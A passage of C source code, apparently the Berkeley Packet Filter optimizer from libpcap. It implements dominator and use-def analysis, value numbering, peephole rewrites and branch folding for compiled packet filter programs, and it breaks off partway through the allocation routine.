__GNUC__ #define inline #endif #define A_ATOM BPF_MEMWORDS #define X_ATOM (BPF_MEMWORDS+1) #define NOP -1 /* * This define is used to represent *both* the accumulator and * x register in use-def computations. * Currently, the use-def code assumes only one definition per instruction. */ #define AX_ATOM N_ATOMS /* * A flag to indicate that further optimization is needed. * Iterative passes are continued until a given pass yields no * branch movement. */ static int done; /* * A block is marked if only if its mark equals the current mark. * Rather than traverse the code array, marking each item, 'cur_mark' is * incremented. This automatically makes each element unmarked. */ static int cur_mark; #define isMarked(p) ((p)->mark == cur_mark) #define unMarkAll() cur_mark += 1 #define Mark(p) ((p)->mark = cur_mark) static void opt_init(struct block *); static void opt_cleanup(void); static void make_marks(struct block *); static void mark_code(struct block *); static void intern_blocks(struct block *); static int eq_slist(struct slist *, struct slist *); static void find_levels_r(struct block *); static void find_levels(struct block *); static void find_dom(struct block *); static void propedom(struct edge *); static void find_edom(struct block *); static void find_closure(struct block *); static int atomuse(struct stmt *); static int atomdef(struct stmt *); static void compute_local_ud(struct block *); static void find_ud(struct block *); static void init_val(void); static long F(int, long, long); static inline void vstore(struct stmt *, long *, long, int); static void opt_blk(struct block *, int); static int use_conflict(struct block *, struct block *); static void opt_j(struct edge *); static void or_pullup(struct block *); static void and_pullup(struct block *); static void opt_blks(struct block *, int); static inline void link_inedge(struct edge *, struct block *); static void find_inedges(struct block *); static void opt_root(struct block **); static void opt_loop(struct block *, int); static void fold_op(struct stmt *, long, long); static inline struct slist *this_op(struct slist *); static void opt_not(struct block *); static void opt_peep(struct block *); static void opt_stmt(struct stmt *, long[], int); static void deadstmt(struct stmt *, struct stmt *[]); static void opt_deadstores(struct block *); static void opt_blk(struct block *, int); static int use_conflict(struct block *, struct block *); static void opt_j(struct edge *); static struct block *fold_edge(struct block *, struct edge *); static inline int eq_blk(struct block *, struct block *); static int slength(struct slist *); static int count_blocks(struct block *); static void number_blks_r(struct block *); static int count_stmts(struct block *); static void convert_code_r(struct block *); static int n_blocks; struct block **blocks; static int n_edges; struct edge **edges; /* * A bit vector set representation of the dominators. * We round up the set size to the next power of two. */ static int nodewords; static int edgewords; struct block **levels; u_long *space; #define BITS_PER_WORD (8*sizeof(u_long)) /* * True if a is in uset {p} */ #define SET_MEMBER(p, a) \ ((p)[(unsigned)(a) / BITS_PER_WORD] & (1 << ((unsigned)(a) % BITS_PER_WORD))) /* * Add 'a' to uset p. */ #define SET_INSERT(p, a) \ (p)[(unsigned)(a) / BITS_PER_WORD] |= (1 << ((unsigned)(a) % BITS_PER_WORD)) /* * Delete 'a' from uset p. */ #define SET_DELETE(p, a) \ (p)[(unsigned)(a) / BITS_PER_WORD] &= ~(1 << ((unsigned)(a) % BITS_PER_WORD)) /* * a := a intersect b */ #define SET_INTERSECT(a, b, n)\ {\ register u_long *_x = a, *_y = b;\ register int _n = n;\ while (--_n >= 0) *_x++ &= *_y++;\ } /* * a := a - b */ #define SET_SUBTRACT(a, b, n)\ {\ register u_long *_x = a, *_y = b;\ register int _n = n;\ while (--_n >= 0) *_x++ &=~ *_y++;\ } /* * a := a union b */ #define SET_UNION(a, b, n)\ {\ register u_long *_x = a, *_y = b;\ register int _n = n;\ while (--_n >= 0) *_x++ |= *_y++;\ } static uset all_dom_sets; static uset all_closure_sets; static uset all_edge_sets; #ifndef MAX #define MAX(a,b) ((a)>(b)?(a):(b)) #endif static void find_levels_r(b) struct block *b; { int level; if (isMarked(b)) return; Mark(b); b->link = 0; if (JT(b)) { find_levels_r(JT(b)); find_levels_r(JF(b)); level = MAX(JT(b)->level, JF(b)->level) + 1; } else level = 0; b->level = level; b->link = levels[level]; levels[level] = b; } /* * Level graph. The levels go from 0 at the leaves to * N_LEVELS at the root. The levels[] array points to the * first node of the level list, whose elements are linked * with the 'link' field of the struct block. */ static void find_levels(root) struct block *root; { memset((char *)levels, 0, n_blocks * sizeof(*levels)); unMarkAll(); find_levels_r(root); } /* * Find dominator relationships. * Assumes graph has been leveled. */ static void find_dom(root) struct block *root; { int i; struct block *b; u_long *x; /* * Initialize sets to contain all nodes. */ x = all_dom_sets; i = n_blocks * nodewords; while (--i >= 0) *x++ = ~0; /* Root starts off empty. */ for (i = nodewords; --i >= 0;) root->dom[i] = 0; /* root->level is the highest level no found. */ for (i = root->level; i >= 0; --i) { for (b = levels[i]; b; b = b->link) { SET_INSERT(b->dom, b->id); if (JT(b) == 0) continue; SET_INTERSECT(JT(b)->dom, b->dom, nodewords); SET_INTERSECT(JF(b)->dom, b->dom, nodewords); } } } static void propedom(ep) struct edge *ep; { SET_INSERT(ep->edom, ep->id); if (ep->succ) { SET_INTERSECT(ep->succ->et.edom, ep->edom, edgewords); SET_INTERSECT(ep->succ->ef.edom, ep->edom, edgewords); } } /* * Compute edge dominators. * Assumes graph has been leveled and predecessors established. */ static void find_edom(root) struct block *root; { int i; uset x; struct block *b; x = all_edge_sets; for (i = n_edges * edgewords; --i >= 0; ) x[i] = ~0; /* root->level is the highest level no found. */ memset(root->et.edom, 0, edgewords * sizeof(*(uset)0)); memset(root->ef.edom, 0, edgewords * sizeof(*(uset)0)); for (i = root->level; i >= 0; --i) { for (b = levels[i]; b != 0; b = b->link) { propedom(&b->et); propedom(&b->ef); } } } /* * Find the backwards transitive closure of the flow graph. These sets * are backwards in the sense that we find the set of nodes that reach * a given node, not the set of nodes that can be reached by a node. * * Assumes graph has been leveled. */ static void find_closure(root) struct block *root; { int i; struct block *b; /* * Initialize sets to contain no nodes. */ memset((char *)all_closure_sets, 0, n_blocks * nodewords * sizeof(*all_closure_sets)); /* root->level is the highest level no found. */ for (i = root->level; i >= 0; --i) { for (b = levels[i]; b; b = b->link) { SET_INSERT(b->closure, b->id); if (JT(b) == 0) continue; SET_UNION(JT(b)->closure, b->closure, nodewords); SET_UNION(JF(b)->closure, b->closure, nodewords); } } } /* * Return the register number that is used by s. If A and X are both * used, return AX_ATOM. If no register is used, return -1. * * The implementation should probably change to an array access. */ static int atomuse(s) struct stmt *s; { register int c = s->code; if (c == NOP) return -1; switch (BPF_CLASS(c)) { case BPF_RET: return (BPF_RVAL(c) == BPF_A) ? A_ATOM : (BPF_RVAL(c) == BPF_X) ? X_ATOM : -1; case BPF_LD: case BPF_LDX: return (BPF_MODE(c) == BPF_IND) ? X_ATOM : (BPF_MODE(c) == BPF_MEM) ? s->k : -1; case BPF_ST: return A_ATOM; case BPF_STX: return X_ATOM; case BPF_JMP: case BPF_ALU: if (BPF_SRC(c) == BPF_X) return AX_ATOM; return A_ATOM; case BPF_MISC: return BPF_MISCOP(c) == BPF_TXA ? X_ATOM : A_ATOM; } abort(); /* NOTREACHED */ } /* * Return the register number that is defined by 's'. We assume that * a single stmt cannot define more than one register. If no register * is defined, return -1. * * The implementation should probably change to an array access. */ static int atomdef(s) struct stmt *s; { if (s->code == NOP) return -1; switch (BPF_CLASS(s->code)) { case BPF_LD: case BPF_ALU: return A_ATOM; case BPF_LDX: return X_ATOM; case BPF_ST: case BPF_STX: return s->k; case BPF_MISC: return BPF_MISCOP(s->code) == BPF_TAX ? X_ATOM : A_ATOM; } return -1; } static void compute_local_ud(b) struct block *b; { struct slist *s; atomset def = 0, use = 0, kill = 0; int atom; for (s = b->stmts; s; s = s->next) { if (s->s.code == NOP) continue; atom = atomuse(&s->s); if (atom >= 0) { if (atom == AX_ATOM) { if (!ATOMELEM(def, X_ATOM)) use |= ATOMMASK(X_ATOM); if (!ATOMELEM(def, A_ATOM)) use |= ATOMMASK(A_ATOM); } else if (atom < N_ATOMS) { if (!ATOMELEM(def, atom)) use |= ATOMMASK(atom); } else abort(); } atom = atomdef(&s->s); if (atom >= 0) { if (!ATOMELEM(use, atom)) kill |= ATOMMASK(atom); def |= ATOMMASK(atom); } } if (!ATOMELEM(def, A_ATOM) && BPF_CLASS(b->s.code) == BPF_JMP) use |= ATOMMASK(A_ATOM); b->def = def; b->kill = kill; b->in_use = use; } /* * Assume graph is already leveled. */ static void find_ud(root) struct block *root; { int i, maxlevel; struct block *p; /* * root->level is the highest level no found; * count down from there. */ maxlevel = root->level; for (i = maxlevel; i >= 0; --i) for (p = levels[i]; p; p = p->link) { compute_local_ud(p); p->out_use = 0; } for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { p->out_use |= JT(p)->in_use | JF(p)->in_use; p->in_use |= p->out_use &~ p->kill; } } } /* * These data structures are used in a Cocke and Shwarz style * value numbering scheme. Since the flowgraph is acyclic, * exit values can be propagated from a node's predecessors * provided it is uniquely defined. */ struct valnode { int code; long v0, v1; long val; struct valnode *next; }; #define MODULUS 213 static struct valnode *hashtbl[MODULUS]; static int curval; static int maxval; /* Integer constants mapped with the load immediate opcode. */ #define K(i) F(BPF_LD|BPF_IMM|BPF_W, i, 0L) struct vmapinfo { int is_const; long const_val; }; struct vmapinfo *vmap; struct valnode *vnode_base; struct valnode *next_vnode; static void init_val() { curval = 0; next_vnode = vnode_base; memset((char *)vmap, 0, maxval * sizeof(*vmap)); memset((char *)hashtbl, 0, sizeof hashtbl); } /* Because we really don't have an IR, this stuff is a little messy. */ static long F(code, v0, v1) int code; long v0, v1; { u_int hash; int val; struct valnode *p; hash = (u_int)code ^ (v0 << 4) ^ (v1 << 8); hash %= MODULUS; for (p = hashtbl[hash]; p; p = p->next) if (p->code == code && p->v0 == v0 && p->v1 == v1) return p->val; val = ++curval; if (BPF_MODE(code) == BPF_IMM && (BPF_CLASS(code) == BPF_LD || BPF_CLASS(code) == BPF_LDX)) { vmap[val].const_val = v0; vmap[val].is_const = 1; } p = next_vnode++; p->val = val; p->code = code; p->v0 = v0; p->v1 = v1; p->next = hashtbl[hash]; hashtbl[hash] = p; return val; } static inline void vstore(s, valp, newval, alter) struct stmt *s; long *valp; long newval; int alter; { if (alter && *valp == newval) s->code = NOP; else *valp = newval; } static void fold_op(s, v0, v1) struct stmt *s; long v0, v1; { long a, b; a = vmap[v0].const_val; b = vmap[v1].const_val; switch (BPF_OP(s->code)) { case BPF_ADD: a += b; break; case BPF_SUB: a -= b; break; case BPF_MUL: a *= b; break; case BPF_DIV: if (b == 0) bpf_error("division by zero"); a /= b; break; case BPF_AND: a &= b; break; case BPF_OR: a |= b; break; case BPF_LSH: a <<= b; break; case BPF_RSH: a >>= b; break; case BPF_NEG: a = -a; break; default: abort(); } s->k = a; s->code = BPF_LD|BPF_IMM; done = 0; } static inline struct slist * this_op(s) struct slist *s; { while (s != 0 && s->s.code == NOP) s = s->next; return s; } static void opt_not(b) struct block *b; { struct block *tmp = JT(b); JT(b) = JF(b); JF(b) = tmp; } static void opt_peep(b) struct block *b; { struct slist *s; struct slist *next, *last; int val; long v; s = b->stmts; if (s == 0) return; last = s; while (1) { s = this_op(s); if (s == 0) break; next = this_op(s->next); if (next == 0) break; last = next; /* * st M[k] --> st M[k] * ldx M[k] tax */ if (s->s.code == BPF_ST && next->s.code == (BPF_LDX|BPF_MEM) && s->s.k == next->s.k) { done = 0; next->s.code = BPF_MISC|BPF_TAX; } /* * ld #k --> ldx #k * tax txa */ if (s->s.code == (BPF_LD|BPF_IMM) && next->s.code == (BPF_MISC|BPF_TAX)) { s->s.code = BPF_LDX|BPF_IMM; next->s.code = BPF_MISC|BPF_TXA; done = 0; } /* * This is an ugly special case, but it happens * when you say tcp[k] or udp[k] where k is a constant. */ if (s->s.code == (BPF_LD|BPF_IMM)) { struct slist *add, *tax, *ild; /* * Check that X isn't used on exit from this * block (which the optimizer might cause). * We know the code generator won't generate * any local dependencies. */ if (ATOMELEM(b->out_use, X_ATOM)) break; if (next->s.code != (BPF_LDX|BPF_MSH|BPF_B)) add = next; else add = this_op(next->next); if (add == 0 || add->s.code != (BPF_ALU|BPF_ADD|BPF_X)) break; tax = this_op(add->next); if (tax == 0 || tax->s.code != (BPF_MISC|BPF_TAX)) break; ild = this_op(tax->next); if (ild == 0 || BPF_CLASS(ild->s.code) != BPF_LD || BPF_MODE(ild->s.code) != BPF_IND) break; /* * XXX We need to check that X is not * subsequently used. We know we can eliminate the * accumulator modifications since it is defined * by the last stmt of this sequence. * * We want to turn this sequence: * * (004) ldi #0x2 {s} * (005) ldxms [14] {next} -- optional * (006) addx {add} * (007) tax {tax} * (008) ild [x+0] {ild} * * into this sequence: * * (004) nop * (005) ldxms [14] * (006) nop * (007) nop * (008) ild [x+2] * */ ild->s.k += s->s.k; s->s.code = NOP; add->s.code = NOP; tax->s.code = NOP; done = 0; } s = next; } /* * If we have a subtract to do a comparison, and the X register * is a known constant, we can merge this value into the * comparison. */ if (last->s.code == (BPF_ALU|BPF_SUB|BPF_X) && !ATOMELEM(b->out_use, A_ATOM)) { val = b->val[X_ATOM]; if (vmap[val].is_const) { b->s.k += vmap[val].const_val; last->s.code = NOP; done = 0; } else if (b->s.k == 0) { /* * sub x -> nop * j #0 j x */ last->s.code = NOP; b->s.code = BPF_CLASS(b->s.code) | BPF_OP(b->s.code) | BPF_X; done = 0; } } /* * Likewise, a constant subtract can be simplified. */ else if (last->s.code == (BPF_ALU|BPF_SUB|BPF_K) && !ATOMELEM(b->out_use, A_ATOM)) { b->s.k += last->s.k; last->s.code = NOP; done = 0; } /* * and #k nop * jeq #0 -> jset #k */ if (last->s.code == (BPF_ALU|BPF_AND|BPF_K) && !ATOMELEM(b->out_use, A_ATOM) && b->s.k == 0) { b->s.k = last->s.k; b->s.code = BPF_JMP|BPF_K|BPF_JSET; last->s.code = NOP; done = 0; opt_not(b); } /* * If the accumulator is a known constant, we can compute the * comparison result. */ val = b->val[A_ATOM]; if (vmap[val].is_const && BPF_SRC(b->s.code) == BPF_K) { v = vmap[val].const_val; switch (BPF_OP(b->s.code)) { case BPF_JEQ: v = v == b->s.k; break; case BPF_JGT: v = v > b->s.k; break; case BPF_JGE: v = v >= b->s.k; break; case BPF_JSET: v &= b->s.k; break; default: abort(); } if (JF(b) != JT(b)) done = 0; if (v) JF(b) = JT(b); else JT(b) = JF(b); } } /* * Compute the symbolic value of expression of 's', and update * anything it defines in the value table 'val'. If 'alter' is true, * do various optimizations. This code would be cleaner if symbolic * evaluation and code transformations weren't folded together. */ static void opt_stmt(s, val, alter) struct stmt *s; long val[]; int alter; { int op; long v; switch (s->code) { case BPF_LD|BPF_ABS|BPF_W: case BPF_LD|BPF_ABS|BPF_H: case BPF_LD|BPF_ABS|BPF_B: v = F(s->code, s->k, 0L); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_IND|BPF_W: case BPF_LD|BPF_IND|BPF_H: case BPF_LD|BPF_IND|BPF_B: v = val[X_ATOM]; if (alter && vmap[v].is_const) { s->code = BPF_LD|BPF_ABS|BPF_SIZE(s->code); s->k += vmap[v].const_val; v = F(s->code, s->k, 0L); done = 0; } else v = F(s->code, s->k, v); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_LEN: v = F(s->code, 0L, 0L); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_IMM: v = K(s->k); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LDX|BPF_IMM: v = K(s->k); vstore(s, &val[X_ATOM], v, alter); break; case BPF_LDX|BPF_MSH|BPF_B: v = F(s->code, s->k, 0L); vstore(s, &val[X_ATOM], v, alter); break; case BPF_ALU|BPF_NEG: if (alter && vmap[val[A_ATOM]].is_const) { s->code = BPF_LD|BPF_IMM; s->k = -vmap[val[A_ATOM]].const_val; val[A_ATOM] = K(s->k); } else val[A_ATOM] = F(s->code, val[A_ATOM], 0L); break; case BPF_ALU|BPF_ADD|BPF_K: case BPF_ALU|BPF_SUB|BPF_K: case BPF_ALU|BPF_MUL|BPF_K: case BPF_ALU|BPF_DIV|BPF_K: case BPF_ALU|BPF_AND|BPF_K: case BPF_ALU|BPF_OR|BPF_K: case BPF_ALU|BPF_LSH|BPF_K: case BPF_ALU|BPF_RSH|BPF_K: op = BPF_OP(s->code); if (alter) { if (s->k == 0) { if (op == BPF_ADD || op == BPF_SUB || op == BPF_LSH || op == BPF_RSH || op == BPF_OR) { s->code = NOP; break; } if (op == BPF_MUL || op == BPF_AND) { s->code = BPF_LD|BPF_IMM; val[A_ATOM] = K(s->k); break; } } if (vmap[val[A_ATOM]].is_const) { fold_op(s, val[A_ATOM], K(s->k)); val[A_ATOM] = K(s->k); break; } } val[A_ATOM] = F(s->code, val[A_ATOM], K(s->k)); break; case BPF_ALU|BPF_ADD|BPF_X: case BPF_ALU|BPF_SUB|BPF_X: case BPF_ALU|BPF_MUL|BPF_X: case BPF_ALU|BPF_DIV|BPF_X: case BPF_ALU|BPF_AND|BPF_X: case BPF_ALU|BPF_OR|BPF_X: case BPF_ALU|BPF_LSH|BPF_X: case BPF_ALU|BPF_RSH|BPF_X: op = BPF_OP(s->code); if (alter && vmap[val[X_ATOM]].is_const) { if (vmap[val[A_ATOM]].is_const) { fold_op(s, val[A_ATOM], val[X_ATOM]); val[A_ATOM] = K(s->k); } else { s->code = BPF_ALU|BPF_K|op; s->k = vmap[val[X_ATOM]].const_val; done = 0; val[A_ATOM] = F(s->code, val[A_ATOM], K(s->k)); } break; } /* * Check if we're doing something to an accumulator * that is 0, and simplify. This may not seem like * much of a simplification but it could open up further * optimizations. * XXX We could also check for mul by 1, and -1, etc. */ if (alter && vmap[val[A_ATOM]].is_const && vmap[val[A_ATOM]].const_val == 0) { if (op == BPF_ADD || op == BPF_OR || op == BPF_LSH || op == BPF_RSH || op == BPF_SUB) { s->code = BPF_MISC|BPF_TXA; vstore(s, &val[A_ATOM], val[X_ATOM], alter); break; } else if (op == BPF_MUL || op == BPF_DIV || op == BPF_AND) { s->code = BPF_LD|BPF_IMM; s->k = 0; vstore(s, &val[A_ATOM], K(s->k), alter); break; } else if (op == BPF_NEG) { s->code = NOP; break; } } val[A_ATOM] = F(s->code, val[A_ATOM], val[X_ATOM]); break; case BPF_MISC|BPF_TXA: vstore(s, &val[A_ATOM], val[X_ATOM], alter); break; case BPF_LD|BPF_MEM: v = val[s->k]; if (alter && vmap[v].is_const) { s->code = BPF_LD|BPF_IMM; s->k = vmap[v].const_val; done = 0; } vstore(s, &val[A_ATOM], v, alter); break; case BPF_MISC|BPF_TAX: vstore(s, &val[X_ATOM], val[A_ATOM], alter); break; case BPF_LDX|BPF_MEM: v = val[s->k]; if (alter && vmap[v].is_const) { s->code = BPF_LDX|BPF_IMM; s->k = vmap[v].const_val; done = 0; } vstore(s, &val[X_ATOM], v, alter); break; case BPF_ST: vstore(s, &val[s->k], val[A_ATOM], alter); break; case BPF_STX: vstore(s, &val[s->k], val[X_ATOM], alter); break; } } static void deadstmt(s, last) register struct stmt *s; register struct stmt *last[]; { register int atom; atom = atomuse(s); if (atom >= 0) { if (atom == AX_ATOM) { last[X_ATOM] = 0; last[A_ATOM] = 0; } else last[atom] = 0; } atom = atomdef(s); if (atom >= 0) { if (last[atom]) { done = 0; last[atom]->code = NOP; } last[atom] = s; } } static void opt_deadstores(b) register struct block *b; { register struct slist *s; register int atom; struct stmt *last[N_ATOMS]; memset((char *)last, 0, sizeof last); for (s = b->stmts; s != 0; s = s->next) deadstmt(&s->s, last); deadstmt(&b->s, last); for (atom = 0; atom < N_ATOMS; ++atom) if (last[atom] && !ATOMELEM(b->out_use, atom)) { last[atom]->code = NOP; done = 0; } } static void opt_blk(b, do_stmts) struct block *b; int do_stmts; { struct slist *s; struct edge *p; int i; long aval; /* * Initialize the atom values. * If we have no predecessors, everything is undefined. * Otherwise, we inherent our values from our predecessors. * If any register has an ambiguous value (i.e. control paths are * merging) give it the undefined value of 0. */ p = b->in_edges; if (p == 0) memset((char *)b->val, 0, sizeof(b->val)); else { memcpy((char *)b->val, (char *)p->pred->val, sizeof(b->val)); while ((p = p->next) != NULL) { for (i = 0; i < N_ATOMS; ++i) if (b->val[i] != p->pred->val[i]) b->val[i] = 0; } } aval = b->val[A_ATOM]; for (s = b->stmts; s; s = s->next) opt_stmt(&s->s, b->val, do_stmts); /* * This is a special case: if we don't use anything from this * block, and we load the accumulator with value that is * already there, eliminate all the statements. */ if (do_stmts && b->out_use == 0 && aval != 0 && b->val[A_ATOM] == aval) b->stmts = 0; else { opt_peep(b); opt_deadstores(b); } /* * Set up values for branch optimizer. */ if (BPF_SRC(b->s.code) == BPF_K) b->oval = K(b->s.k); else b->oval = b->val[X_ATOM]; b->et.code = b->s.code; b->ef.code = -b->s.code; } /* * Return true if any register that is used on exit from 'succ', has * an exit value that is different from the corresponding exit value * from 'b'. */ static int use_conflict(b, succ) struct block *b, *succ; { int atom; atomset use = succ->out_use; if (use == 0) return 0; for (atom = 0; atom < N_ATOMS; ++atom) if (ATOMELEM(use, atom)) if (b->val[atom] != succ->val[atom]) return 1; return 0; } static struct block * fold_edge(child, ep) struct block *child; struct edge *ep; { int sense; int aval0, aval1, oval0, oval1; int code = ep->code; if (code < 0) { code = -code; sense = 0; } else sense = 1; if (child->s.code != code) return 0; aval0 = child->val[A_ATOM]; oval0 = child->oval; aval1 = ep->pred->val[A_ATOM]; oval1 = ep->pred->oval; if (aval0 != aval1) return 0; if (oval0 == oval1) /* * The operands are identical, so the * result is true if a true branch was * taken to get here, otherwise false. */ return sense ? JT(child) : JF(child); if (sense && code == (BPF_JMP|BPF_JEQ|BPF_K)) /* * At this point, we only know the comparison if we * came down the true branch, and it was an equality * comparison with a constant. We rely on the fact that * distinct constants have distinct value numbers. */ return JF(child); return 0; } static void opt_j(ep) struct edge *ep; { register int i, k; register struct block *target; if (JT(ep->succ) == 0) return; if (JT(ep->succ) == JF(ep->succ)) { /* * Common branch targets can be eliminated, provided * there is no data dependency. */ if (!use_conflict(ep->pred, ep->succ->et.succ)) { done = 0; ep->succ = JT(ep->succ); } } /* * For each edge dominator that matches the successor of this * edge, promote the edge successor to the its grandchild. * * XXX We violate the set abstraction here in favor a reasonably * efficient loop. */ top: for (i = 0; i < edgewords; ++i) { register u_long x = ep->edom[i]; while (x != 0) { k = ffs(x) - 1; x &=~ (1 << k); k += i * BITS_PER_WORD; target = fold_edge(ep->succ, edges[k]); /* * Check that there is no data dependency between * nodes that will be violated if we move the edge. */ if (target != 0 && !use_conflict(ep->pred, target)) { done = 0; ep->succ = target; if (JT(target) != 0) /* * Start over unless we hit a leaf. */ goto top; return; } } } } static void or_pullup(b) struct block *b; { int val, at_top; struct block *pull; struct block **diffp, **samep; struct edge *ep; ep = b->in_edges; if (ep == 0) return; /* * Make sure each predecessor loads the same value. * XXX why? */ val = ep->pred->val[A_ATOM]; for (ep = ep->next; ep != 0; ep = ep->next) if (val != ep->pred->val[A_ATOM]) return; if (JT(b->in_edges->pred) == b) diffp = &JT(b->in_edges->pred); else diffp = &JF(b->in_edges->pred); at_top = 1; while (1) { if (*diffp == 0) return; if (JT(*diffp) != JT(b)) return; if (!SET_MEMBER((*diffp)->dom, b->id)) return; if ((*diffp)->val[A_ATOM] != val) break; diffp = &JF(*diffp); at_top = 0; } samep = &JF(*diffp); while (1) { if (*samep == 0) return; if (JT(*samep) != JT(b)) return; if (!SET_MEMBER((*samep)->dom, b->id)) return; if ((*samep)->val[A_ATOM] == val) break; /* XXX Need to check that there are no data dependencies between dp0 and dp1. Currently, the code generator will not produce such dependencies. */ samep = &JF(*samep); } #ifdef notdef /* XXX This doesn't cover everything. */ for (i = 0; i < N_ATOMS; ++i) if ((*samep)->val[i] != pred->val[i]) return; #endif /* Pull up the node. */ pull = *samep; *samep = JF(pull); JF(pull) = *diffp; /* * At the top of the chain, each predecessor needs to point at the * pulled up node. Inside the chain, there is only one predecessor * to worry about. */ if (at_top) { for (ep = b->in_edges; ep != 0; ep = ep->next) { if (JT(ep->pred) == b) JT(ep->pred) = pull; else JF(ep->pred) = pull; } } else *diffp = pull; done = 0; } static void and_pullup(b) struct block *b; { int val, at_top; struct block *pull; struct block **diffp, **samep; struct edge *ep; ep = b->in_edges; if (ep == 0) return; /* * Make sure each predecessor loads the same value. */ val = ep->pred->val[A_ATOM]; for (ep = ep->next; ep != 0; ep = ep->next) if (val != ep->pred->val[A_ATOM]) return; if (JT(b->in_edges->pred) == b) diffp = &JT(b->in_edges->pred); else diffp = &JF(b->in_edges->pred); at_top = 1; while (1) { if (*diffp == 0) return; if (JF(*diffp) != JF(b)) return; if (!SET_MEMBER((*diffp)->dom, b->id)) return; if ((*diffp)->val[A_ATOM] != val) break; diffp = &JT(*diffp); at_top = 0; } samep = &JT(*diffp); while (1) { if (*samep == 0) return; if (JF(*samep) != JF(b)) return; if (!SET_MEMBER((*samep)->dom, b->id)) return; if ((*samep)->val[A_ATOM] == val) break; /* XXX Need to check that there are no data dependencies between diffp and samep. Currently, the code generator will not produce such dependencies. */ samep = &JT(*samep); } #ifdef notdef /* XXX This doesn't cover everything. */ for (i = 0; i < N_ATOMS; ++i) if ((*samep)->val[i] != pred->val[i]) return; #endif /* Pull up the node. */ pull = *samep; *samep = JT(pull); JT(pull) = *diffp; /* * At the top of the chain, each predecessor needs to point at the * pulled up node. Inside the chain, there is only one predecessor * to worry about. */ if (at_top) { for (ep = b->in_edges; ep != 0; ep = ep->next) { if (JT(ep->pred) == b) JT(ep->pred) = pull; else JF(ep->pred) = pull; } } else *diffp = pull; done = 0; } static void opt_blks(root, do_stmts) struct block *root; int do_stmts; { int i, maxlevel; struct block *p; init_val(); maxlevel = root->level; for (i = maxlevel; i >= 0; --i) for (p = levels[i]; p; p = p->link) opt_blk(p, do_stmts); if (do_stmts) /* * No point trying to move branches; it can't possibly * make a difference at this point. */ return; for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { opt_j(&p->et); opt_j(&p->ef); } } for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { or_pullup(p); and_pullup(p); } } } static inline void link_inedge(parent, child) struct edge *parent; struct block *child; { parent->next = child->in_edges; child->in_edges = parent; } static void find_inedges(root) struct block *root; { int i; struct block *b; for (i = 0; i < n_blocks; ++i) blocks[i]->in_edges = 0; /* * Traverse the graph, adding each edge to the predecessor * list of its successors. Skip the leaves (i.e. level 0). */ for (i = root->level; i > 0; --i) { for (b = levels[i]; b != 0; b = b->link) { link_inedge(&b->et, JT(b)); link_inedge(&b->ef, JF(b)); } } } static void opt_root(b) struct block **b; { struct slist *tmp, *s; s = (*b)->stmts; (*b)->stmts = 0; while (BPF_CLASS((*b)->s.code) == BPF_JMP && JT(*b) == JF(*b)) *b = JT(*b); tmp = (*b)->stmts; if (tmp != 0) sappend(s, tmp); (*b)->stmts = s; } static void opt_loop(root, do_stmts) struct block *root; int do_stmts; { #ifdef BDEBUG if (dflag > 1) opt_dump(root); #endif do { done = 1; find_levels(root); find_dom(root); find_closure(root); find_inedges(root); find_ud(root); find_edom(root); opt_blks(root, do_stmts); #ifdef BDEBUG if (dflag > 1) opt_dump(root); #endif } while (!done); } /* * Optimize the filter code in its dag representation. */ void bpf_optimize(rootp) struct block **rootp; { struct block *root; root = *rootp; opt_init(root); opt_loop(root, 0); opt_loop(root, 1); intern_blocks(root); opt_root(rootp); opt_cleanup(); } static void make_marks(p) struct block *p; { if (!isMarked(p)) { Mark(p); if (BPF_CLASS(p->s.code) != BPF_RET) { make_marks(JT(p)); make_marks(JF(p)); } } } /* * Mark code array such that isMarked(i) is true * only for nodes that are alive. */ static void mark_code(p) struct block *p; { cur_mark += 1; make_marks(p); } /* * True iff the two stmt lists load the same value from the packet into * the accumulator. */ static int eq_slist(x, y) struct slist *x, *y; { while (1) { while (x && x->s.code == NOP) x = x->next; while (y && y->s.code == NOP) y = y->next; if (x == 0) return y == 0; if (y == 0) return x == 0; if (x->s.code != y->s.code || x->s.k != y->s.k) return 0; x = x->next; y = y->next; } } static inline int eq_blk(b0, b1) struct block *b0, *b1; { if (b0->s.code == b1->s.code && b0->s.k == b1->s.k && b0->et.succ == b1->et.succ && b0->ef.succ == b1->ef.succ) return eq_slist(b0->stmts, b1->stmts); return 0; } static void intern_blocks(root) struct block *root; { struct block *p; int i, j; int done; top: done = 1; for (i = 0; i < n_blocks; ++i) blocks[i]->link = 0; mark_code(root); for (i = n_blocks - 1; --i >= 0; ) { if (!isMarked(blocks[i])) continue; for (j = i + 1; j < n_blocks; ++j) { if (!isMarked(blocks[j])) continue; if (eq_blk(blocks[i], blocks[j])) { blocks[i]->link = blocks[j]->link ? blocks[j]->link : blocks[j]; break; } } } for (i = 0; i < n_blocks; ++i) { p = blocks[i]; if (JT(p) == 0) continue; if (JT(p)->link) { done = 0; JT(p) = JT(p)->link; } if (JF(p)->link) { done = 0; JF(p) = JF(p)->link; } } if (!done) goto top; } static void opt_cleanup() { free((void *)vnode_base); free((void *)vmap); free((void *)edges); free((void *)space); free((void *)levels); free((void *)blocks); } /* * Return the number of stmts in 's'. */ static int slength(s) struct slist *s; { int n = 0; for (; s; s = s->next) if (s->s.code != NOP) ++n; return n; } /* * Return the number of nodes reachable by 'p'. * All nodes should be initially unmarked. */ static int count_blocks(p) struct block *p; { if (p == 0 || isMarked(p)) return 0; Mark(p); return count_blocks(JT(p)) + count_blocks(JF(p)) + 1; } /* * Do a depth first search on the flow graph, numbering the * the basic blocks, and entering them into the 'blocks' array.` */ static void number_blks_r(p) struct block *p; { int n; if (p == 0 || isMarked(p)) return; Mark(p); n = n_blocks++; p->id = n; blocks[n] = p; number_blks_r(JT(p)); number_blks_r(JF(p)); } /* * Return the number of stmts in the flowgraph reachable by 'p'. * The nodes should be unmarked before calling. */ static int count_stmts(p) struct block *p; { int n; if (p == 0 || isMarked(p)) return 0; Mark(p); n = count_stmts(JT(p)) + count_stmts(JF(p)); return slength(p->stmts) + n + 1; } /* * Allocate memory. All allocation is done before optimization * is begun. A linear bound on the size of all data structures is computed * from the total number of blocks and/or statements. */ static void opt_init(root) struct block *root; { u_long *p; int i, n, max_stmts; /* * First, count the blocks, so we can 